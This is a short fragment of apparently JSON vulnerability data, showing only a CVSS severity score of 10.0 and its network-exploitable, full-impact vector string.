10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}